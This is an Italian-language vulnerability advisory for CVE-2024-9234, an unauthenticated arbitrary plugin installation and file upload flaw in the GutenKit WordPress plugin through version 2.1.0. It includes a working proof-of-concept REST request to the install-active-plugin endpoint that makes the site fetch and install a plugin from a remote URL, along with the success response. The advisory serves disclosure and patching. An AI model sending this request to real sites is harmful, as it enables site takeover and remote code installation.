
GutenKit <= 2.1.0 - Caricamento arbitrario di file non autenticato
GutenKit <= 2.1.0 - Caricamento Arbitrario di File Non Autenticato
Il plugin GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor per WordPress è vulnerabile al caricamento arbitrario di file a causa di una mancanza di controllo delle capacità nella funzione install_and_activate_plugin_from_external() (endpoint API REST install-active-plugin) in tutte le versioni fino alla 2.1.0 inclusa. Ciò consente ad attaccanti non autenticati di installare e attivare plugin arbitrari, o di sfruttare la funzionalità per caricare file arbitrari camuffati come plugin.
Type: plugin
CVSS Score: 9.8
CVE: CVE-2024-9234
Slug: gutenkit-blocks-addon
Link di Download: Scarica gutenkit-blocks-addon Versione 2.1.0
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
Content-Type: application/json
Content-Length: 114
{
"plugin": "https://downloads.wordpress.org/plugin/popularis-extra.1.2.6.zip",
"slug": "popularis-extra"
}
{"success":true,"data":"Plugin installed successfully!"}